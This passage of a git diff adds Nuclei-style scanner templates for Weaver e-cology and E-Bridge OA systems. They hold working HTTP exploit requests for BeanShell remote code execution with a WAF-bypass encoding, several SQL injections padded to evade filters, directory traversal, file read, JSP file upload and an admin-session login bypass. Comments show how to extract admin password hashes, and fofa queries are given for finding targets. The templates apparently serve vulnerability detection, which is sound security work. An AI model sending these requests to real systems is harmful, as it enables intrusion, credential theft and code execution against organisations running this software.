https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + tags: eBridge,weaver,oa,read + +http: + - raw: + - | + GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + - | + GET /file/fileNoLogin/{{idname}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + extractors: + - type: regex + name: idname + internal: true + group: 1 + regex: + - '"id":"(.*?)"' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,'id') + - "status_code_2 == 200 && contains(body_2, 'Program Files')" + condition: and + + diff --git a/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml new file mode 100755 index 0000000000..8c56b4036a --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml @@ -0,0 +1,40 @@ +id: weaver-e-cology-bshservlet-rce + +info: + name: Weaver E-Cology BeanShell Remote Command Execution + author: SleepingBag945 + severity: critical + description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + tags: beanshell,rce,weaver + +http: + - raw: + - | + POST /weaver/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + bsh.script=print%28%22{{randstr}}%22%29%3B + + - raw: + - | # bypass waf + POST /weaver/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + %62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b + + matchers-condition: and + matchers: + - type: word + words: + - "BeanShell Test Servlet" + - type: word + words: + - "{{randstr}}" + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/07/05 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml new file mode 100755 index 0000000000..1aa960e3cf --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml @@ -0,0 +1,33 @@ +id: weaver-e-cology-getdata-sqli + +info: + name: weaver-e-cology-getdata-sqli + author: SleepingBag945 + severity: high + description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + tags: ecology,weaver,oa,sqli + +http: + - raw: + - | + GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "1759627252" + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 +# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml new file mode 100755 index 0000000000..edbe68f434 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml @@ -0,0 +1,35 @@ +id: weaver-e-cology-getsqldata-sqli + +info: + name: weaver-e-cology-getsqldata-sqli + author: SleepingBag945 + severity: high + description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + tags: ecology,weaver,oa,sqli + +http: + - raw: + - | + GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"api_status":' + - '"status":true}' + condition: and + + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml new file mode 100755 index 0000000000..9eb6b931d0 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml @@ -0,0 +1,30 @@ +id: weaver-e-cology-hrmcarreerapplyperview-sqli + +info: + name: weaver-e-cology-hrmcarreerapplyperview-sqli + author: SleepingBag945 + severity: high + description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + tags: ecology,weaver,oa,sqli + +http: + - raw: + - | + GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml;charset=UTF-8 + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "900150983cd24fb0d6963f7d28e17f72" + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml b/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml new file mode 100755 index 0000000000..c5f8c22310 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml @@ -0,0 +1,33 @@ +id: weaver-e-cology-jqueryfiletree-directory-traversal + +info: + name: weaver e-cology-jqueryfiletree-directory-traversal + author: SleepingBag945 + severity: medium + description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html + tags: weaver,e-cology,oa + +http: + - raw: + - | + GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + + matchers-condition: and + matchers: + - type: word + words: + - "'index.jsp','" + - type: word + words: + - "重命名" + - type: word + words: + - "新建目录" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..194fc8e07f --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml @@ -0,0 +1,53 @@ +id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload + +info: + name: weaver e-cology KtreeUploadAction arbitrary file upload + author: SleepingBag945 + severity: critical + description: 泛微E-Cology存在文件上传漏洞,攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用 + reference: + - https://buaq.net/go-117479.html + tags: ecology,upload,fileupload,intrusive + +http: + - raw: + - | + POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib + Accept-Encoding: gzip + + ------WebKitFormBoundarywgljfvib + Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp" + Content-Type: image/jpeg + + <%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> + ------WebKitFormBoundarywgljfvib-- + + - | + GET {{filename}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + extractors: + - type: regex + name: filename + internal: true + group: 1 + regex: + - "','url':'(.*?)','title" + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'original')" + - "contains(body_2, '1841626426') && status_code_2 == 200" + condition: and + +# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml new file mode 100755 index 0000000000..0b3991ae4e --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-loginsso-sqli.yaml @@ -0,0 +1,38 @@ +id: weaver-e-cology-loginsso-sqli + +info: + name: weaver-e-cology-loginsso-sqli + author: SleepingBag945 + severity: high + description: 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html + tags: ecology,weaver,oa,sqli + +http: + - raw: + - | + GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(212943773)%20as%20id%20from%20HrmResourceManager HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "db66c43e263be5e8c249b006b1c80792" + - type: word + negative: true + part: header + - "https://www.drupal.org" + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 +# CNVD-2021-33202 +# 蜜罐诱捕器。。 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml new file mode 100755 index 0000000000..1a925b5a39 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read.yaml @@ -0,0 +1,32 @@ +id: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read + +info: + name: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read + author: SleepingBag945 + severity: medium + description: SptmForPortalThumbnail.jsp可控的preview参数未进行过滤操作,直接拼接上web根目录进行文件下载 + reference: + - http://124.223.89.192/archives/e-cology8-14 + tags: weaver,e-cology,oa + +http: + - raw: + - | + GET /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + + matchers-condition: and + matchers: + - type: word + words: + - "weaver.general.BaseBean" + - type: word + words: + - "request.getParameter" + - type: status + status: + - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml new file mode 100755 index 0000000000..ef9b4eb02f --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-uploadoperation-arbitrary-file-upload.yaml @@ -0,0 +1,81 @@ +id: weaver-e-cology-uploadoperation-arbitrary-file-upload + +info: + name: weaver e-cology uploadoperation.jsp arbitrary file upload + author: SleepingBag945 + severity: critical + description: Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cwe-id: CWE-434 + metadata: + fofa-query: app="泛微-协同办公OA" + tags: ecology,upload,fileupload,intrusive + +http: + - raw: + - | + POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj + Accept-Encoding: gzip + + ------WebKitFormBoundaryVdb2RRl25PuaGhWj + Content-Disposition: form-data; name="secId" + + 1 + ------WebKitFormBoundaryVdb2RRl25PuaGhWj + Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.jsp" + + <%out.println("{{randstr_2}}");%> + ------WebKitFormBoundaryVdb2RRl25PuaGhWj + Content-Disposition: form-data; name="plandetailid" + + 1 + ------WebKitFormBoundaryVdb2RRl25PuaGhWj-- + + - | + POST /OfficeServer HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj + Accept-Encoding: gzip + + ------WebKitFormBoundaryVdb2RRl25PuaGhWj + Content-Disposition: form-data; name="aaa" + + {"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{{fileid}}"} + ------WebKitFormBoundaryVdb2RRl25PuaGhWj-- + + - | + GET /{{randstr_1}}.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Accept-Encoding: gzip + + extractors: + - type: regex + name: fileid + internal: true + group: 1 + regex: + - "&fileid=(.*?)\'>" + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')" + - "contains(body_2, 'println') && status_code_2 == 200" + - "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')" + condition: and + +# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml new file mode 100755 index 0000000000..e0a26a518d --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml @@ -0,0 +1,34 @@ +id: weaver-e-cology-validate-sqli + +info: + name: weaver-e-cology-validate-sqli + author: SleepingBag945 + severity: high + description: 泛微e-cology OA系统的validate.jsp文件中,因为对参数capitalid过滤不严,可致使SQL注入漏洞。攻击者运用该漏洞,可在未授权的情况下,远程发送精心构造的SQL语句,从而取得数据库敏感信息。 + tags: ecology,weaver,oa,sqli + +http: + - raw: + - | + POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10 + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "8370114" + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 +# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml b/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml new file mode 100755 index 0000000000..9812101f1c --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-verifyquicklogin-arbitrary-login.yaml @@ -0,0 +1,41 @@ +id: weaver-e-cology-verifyquicklogin-arbitrary-login + +info: + name: weaver e-cology verifyquicklogin.jsp arbitrarylogin + author: SleepingBag945 + severity: high + description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞,攻击者通过发送特殊的请求包可以获取管理员Session + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html + metadata: + fofa-query: app="泛微-协同办公OA" + tags: ecology,weaver,oa + +http: + - raw: + - | + POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + identifier=1&language=1&ipaddress=x.x.x.x + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\"sessionkey\":" + - type: word + part: body + words: + - "\"message\":" + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml new file mode 100755 index 0000000000..5fc3631697 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-e-cology-workflowcentertreedata-sqli.yaml @@ -0,0 +1,39 @@ +id: weaver-e-cology-workflowcentertreedata-sqli + +info: + name: weaver e-cology WorkflowCenterTreeData.jsp sqli + author: SleepingBag945 + severity: high + description: 2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的,任意攻击者都可借SQL语句拼接时机注入恶意payload,造成SQL注入攻击。 + reference: + - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20WorkflowCenterTreeData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + - https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/%E6%B3%9B%E5%BE%AEoa/%E6%B3%9B%E5%BE%AEOA%20WorkflowCenterTreeData%E6%8E%A5%E5%8F%A3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%28%E9%99%90oracle%E6%95%B0%E6%8D%AE%E5%BA%93%29/ + tags: ecology,weaver,oa,sqli + +http: + - raw: + - | + POST /mobile/browser/WorkflowCenterTreeData.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 + Accept: */* + Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip + + node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a)))union+select+1024,(4276*908)+order+by+(((1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"id":"' + - type: word + part: body + words: + - '"text":"' + - type: status + status: + - 200 + +# Enhanced by md on 2022/10/31 diff --git 